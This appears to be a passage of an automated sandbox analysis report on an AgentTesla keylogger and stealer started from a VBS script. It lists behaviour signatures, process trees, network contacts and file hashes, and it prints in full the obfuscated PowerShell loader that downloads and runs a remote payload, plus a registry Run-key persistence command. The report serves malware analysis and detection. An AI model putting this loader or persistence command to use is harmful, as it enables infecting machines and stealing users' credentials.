memory/2916-82-0x00000000066A0000-0x000000000B13E000-memory.dmp

memory/2624-83-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/2624-84-0x000007FEF573E000-0x000007FEF573F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 97cac688ae7032bfb0001f7096df0a78
SHA1 c0e9db883e0f7f2c1f7a689fa6d1a633a015e054
SHA256 9a9408d277b2fbd85a236395b975b07b4d0e9233932bff35bad4e58886f62536
SHA512 450f4818f70735bbd533aa35191e56c0060fb8ec7fe726f5589ca59639d0686ab846203f4292ec4fb8373c4f229a52f90ed97a9a5cab9bbdc7180c9b53274d1b

memory/896-120-0x0000000000540000-0x00000000015A2000-memory.dmp

memory/2624-121-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

memory/896-122-0x0000000000540000-0x0000000000580000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 06:47

Reported

2024-06-03 06:49

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3804 set thread context of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2376 wrote to memory of 4856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 4856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 2580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4856 wrote to memory of 2580 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4856 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4856 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3804 wrote to memory of 3156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 3156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3804 wrote to memory of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3804 wrote to memory of 4364 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4364 wrote to memory of 2888 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 2888 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 2888 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 5044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2888 wrote to memory of 5044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2888 wrote to memory of 5044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 drhhmarketing.com udp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 61.39.21.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 104.21.39.61:443 drhhmarketing.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

memory/4856-0-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp

memory/4856-1-0x00000142E7150000-0x00000142E7172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kovfzfb.5nl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4856-11-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4856-12-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/3804-15-0x0000000004AB0000-0x0000000004AE6000-memory.dmp

memory/3804-16-0x0000000005250000-0x0000000005878000-memory.dmp

memory/3804-17-0x00000000051D0000-0x00000000051F2000-memory.dmp

memory/3804-18-0x00000000059B0000-0x0000000005A16000-memory.dmp

memory/3804-19-0x0000000005A20000-0x0000000005A86000-memory.dmp

memory/3804-29-0x0000000005B90000-0x0000000005EE4000-memory.dmp

memory/3804-30-0x0000000006070000-0x000000000608E000-memory.dmp

memory/3804-31-0x00000000060C0000-0x000000000610C000-memory.dmp

memory/3804-32-0x00000000078C0000-0x0000000007F3A000-memory.dmp

memory/3804-33-0x0000000006600000-0x000000000661A000-memory.dmp

memory/3804-34-0x0000000007320000-0x00000000073B6000-memory.dmp

memory/3804-35-0x00000000072B0000-0x00000000072D2000-memory.dmp

memory/3804-36-0x00000000084F0000-0x0000000008A94000-memory.dmp

C:\Users\Admin\AppData\Roaming\prefulgency.Sto

MD5 4a4d70fe78c5f12946b4676950b00e8a
SHA1 1d7977005546ad74ee56f36552c7aaef6c8dae20
SHA256 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f
SHA512 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def

memory/3804-38-0x0000000008AA0000-0x000000000D53E000-memory.dmp

memory/4856-39-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp

memory/4856-41-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4364-49-0x0000000000680000-0x00000000006C0000-memory.dmp

memory/4364-48-0x0000000000680000-0x00000000018D4000-memory.dmp

memory/4856-52-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp

memory/4364-54-0x0000000024AB0000-0x0000000024B00000-memory.dmp

memory/4364-55-0x00000000251A0000-0x0000000025232000-memory.dmp

memory/4364-56-0x0000000025140000-0x000000002514A000-memory.dmp